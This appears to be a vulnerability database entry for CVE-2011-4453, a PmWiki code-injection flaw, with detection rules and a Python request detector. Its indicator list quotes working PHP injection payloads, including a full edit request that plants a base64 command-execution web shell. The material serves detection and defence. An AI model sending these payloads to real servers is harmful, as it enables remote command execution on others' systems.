CVE-2011-4453
published 2011-12-22


Priority: P266, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 53.41% (98.9th percentile)
The PageListSort function in scripts/pagelist.php in PmWiki 2.x before 2.2.35 allows remote attackers to execute arbitrary code via PHP sequences in a crafted order parameter in a pagelist directive, leading to unintended use of the PHP create_function function.

Affected

76 ranges
Vendor | Product | Version range | Fixed in
pmwiki | pmwiki | |

Detection & IOCs

path: /scripts/pagelist.php
path: /pmwiki.php
command: action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=']);error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD]));print(___);die;#:)
command: ']);error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD]));print(___);die;#
command: (:pagelist order=']);error_reporting(0);eval(base64_decode($_SERVER[HTTP_#{header}]));die;#:)
url: pmwiki.php?n=PmWiki.Version
  • Detect POST requests to pmwiki.php containing a 'pagelist order=' directive with PHP injection sequences (e.g., ']);, error_reporting, passthru, eval, base64_decode) in the 'text' or 'order' parameter.
  • Alert on HTTP requests to pmwiki.php with a custom HTTP header (e.g., 'Cmd:') carrying base64-encoded OS commands, used to pass commands to the injected passthru/eval payload via $_SERVER[HTTP_CMD].
  • Flag POST requests to pmwiki.php with action=edit&post=save and a 'text' body containing '(:pagelist order=' followed by PHP code sequences such as ']);error_reporting(0);.
  • Monitor for the version fingerprint request to pmwiki.php?n=PmWiki.Version, which is used by the Metasploit module to check if the target is running a vulnerable version (pmwiki-2.0.0 to 2.2.34).
  • Exploitation may require authentication if the wiki is not configured for public write access; unauthenticated exploitation is only possible on publicly writable PmWiki instances.
  • The vulnerability affects PmWiki versions 2.0.0 through 2.2.34; version 2.2.35 and later are patched.
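
The detection rules listed above, sketched as a small request inspector that can be run over parsed web-server or proxy records. This is an added example, not code from the page's sources or from PmWiki; the PmWikiDetector class, the rule names and the sample request are assumptions made for illustration. It goes one step beyond the bullets by remembering which `$_SERVER[HTTP_...]` header a stored payload reads, so later requests carrying that header are flagged too.

```python
import base64
import re
from urllib.parse import unquote_plus

# PHP sequences the detection notes above list for a pagelist order= value.
PHP_TOKENS = ("']);", "error_reporting", "passthru", "eval", "base64_decode")
PAGELIST_ORDER = re.compile(r"\(:pagelist\b.*?\border=(.*?):\)", re.I | re.S)
SERVER_HEADER = re.compile(r"\$_SERVER\[['\"]?HTTP_(\w+)")

def form_fields(encoded):
    """Decode an application/x-www-form-urlencoded string into a dict."""
    pairs = (p.partition("=") for p in encoded.split("&"))
    return {unquote_plus(k): unquote_plus(v) for k, _, v in pairs}

def decodes_as_text(value):
    """True if value is strict base64 that decodes to printable ASCII."""
    try:
        decoded = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return bool(decoded) and decoded.isascii() and decoded.decode().isprintable()

class PmWikiDetector:
    def __init__(self):
        self.watched = {"CMD"}  # PHP exposes a "Cmd:" header as HTTP_CMD

    def inspect(self, method, target, headers, body=""):
        """Return the names of the rules one request to pmwiki.php triggers."""
        path, _, query = target.partition("?")
        if not path.endswith("pmwiki.php"):
            return []
        fields = {**form_fields(query), **form_fields(body)}
        hits = ["version-probe"] if fields.get("n") == "PmWiki.Version" else []
        match = PAGELIST_ORDER.search(fields.get("text", ""))
        order = match.group(1) if match else fields.get("order", "")
        if method == "POST" and any(tok in order for tok in PHP_TOKENS):
            saved = fields.get("action") == "edit" and fields.get("post") == "save"
            hits.append("order-injection-saved" if saved else "order-injection")
            # Remember which header the stored payload will read later.
            self.watched.update(h.upper() for h in SERVER_HEADER.findall(order))
        for name, value in headers.items():
            if name.upper().replace("-", "_") in self.watched and decodes_as_text(value):
                hits.append("base64-command-header")
        return hits

# Constructed sample: the edit/save request body quoted in the IOC list above.
SAMPLE_BODY = ("action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=']);"
               "error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD]));"
               "print(___);die;#:)")
```

A `version-probe` hit on its own is low confidence, since ordinary visitors can also view that page; treat it as context for the other rules.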